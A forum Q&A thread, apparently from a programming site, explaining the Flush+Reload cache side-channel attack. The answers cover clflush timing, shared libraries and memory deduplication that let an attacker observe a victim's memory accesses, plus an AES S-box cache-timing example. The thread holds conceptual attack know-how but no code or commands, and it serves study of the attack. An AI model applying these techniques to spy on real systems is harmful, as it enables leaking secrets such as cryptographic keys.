Flush & Reload cache side channel attack

6.8k views Asked by At

I'm trying to understand the Flush + Reload cache side channel attack. As long as I know, the attack utilize the fact that unprivileged data could be loaded to the cache (when exploiting branch prediction, speculative execution, etc). Then, the attacker use a probe array in order to access a memory, memory which is loaded fast assumed to be on the cache (part of the secret data).

One thing which I find it unclear is how does the attacker is able to iterate through virtual memory which is unprivileged memory? For example - iterating on kernel virtual memory or other processes' memory.

2

There are 2 answers

4
b degnan On

Firstly, you should take a look at my description of why lookup tables don't run in constant time, as I have pictures of how the cache and tagging works.

The cache sits between the MMU and the CPU, and the MMU is what creates virtual memory; thereby cache attacks are actually an independent function of virtual memory. They are a function of forcing a cache flush, and then picking and choosing how the cache will be reloaded because you are looking for temporal information. The fetch externally between caches is what leaks information. (A note, this is basically an x86 problem as it does not allow cache locking, unlike most CPUs since 1990. Another caveat is that I have only made hardware for non-x86 architectures so someone please let me know if I am wrong about cache locking for critical data).

For the sake of a general example, we have a cache of 1k bytes and we will use AES s-box as a lookup table, so 256 entries.

  • force a flush of the cache flush via a different process by reading 2k of bytes from memory.
  • the AES process starts running and puts the data sbox data into the cache by proxy of bus fetches
  • We then do another process read of 1023 bytes of different data from memory to override the all but one of the AES entries and see when that data comes out slow due to a bus read

Now for the MMU version where we attack virtual memory. If you looked at the answer I linked, you will see there are cache tags. Now let's assume a simple example where I have two processes with 20-bits (1MiB of address space). The MMU makes both of those processes have the same virtual table from of 0xYYY00000, where YYY is the actual prefix in memory. If I know how the MMU is mapping the data, and I can create a structured attack based on the tagging information that is created in cache due to the how the memory overlaps.

There's more details on how you structure these attacks on the software side in Bernstein's Cache-timing attacks on AES.

2
andy On
  1. There are different cache side channel attacks. There's many variants, but it seems you are confusing two: Prime + Probe and Flush + Reload. Because this is a question about Flush + Reload, I'll stick to that.

  2. Flush + Reload works by abusing shared code/data combined with how the clflush (cache flush instruction) works, at least on x86. There's variants for other architectures. The victim and attacker must share at least 1 page of data physically. When the attacker uses the clflush command with an address pointing to this shared data, it's completely flushed from the cache hierarchy. Because the data is shared, the attacker is allowed to hit on this data in cache. So, the attacker repeatedly flushes shared data with the victim, then allows/waits for the victim to run, then reloads the data. If the attacker has a cache miss, the victim didn't access the data (didn't bring it back to cache). If it's a hit, the victim did (at least probably). The attacker can tell cache hits from misses because the timing of the memory access is very different.

  3. How can the attacker and victim share data if they are different processes? You need to know a little bit about modern OS. Typically, shared libraries are only loaded once physically in memory. As an example, the standard c library is only loaded once, but separate applications access the same data (physically) because their page tables point to the same physical address, because the OS sets it up this way.

  4. Some OS are more aggressive and scan phyiscal memory to find pages which have the exact same data. In this case, they "merge" the pages by changing the page tables so that all processes which use this data point to the new single physical page, instead of having two physical copies. Unfortunately, this allows Flush + Reload to happen even among non shared libraries - if you know the code of the victim, and you want to monitor it, you can just load it into your address space (mmap it) and the OS will happily deduplicate memory, giving you access to their data. As long as you both just read the data, it's fine; if you try to write the data, then the OS will be forced to unmerge the pages. However, this is fine for FLUSH + RELOAD: you are only interested in reading anyway!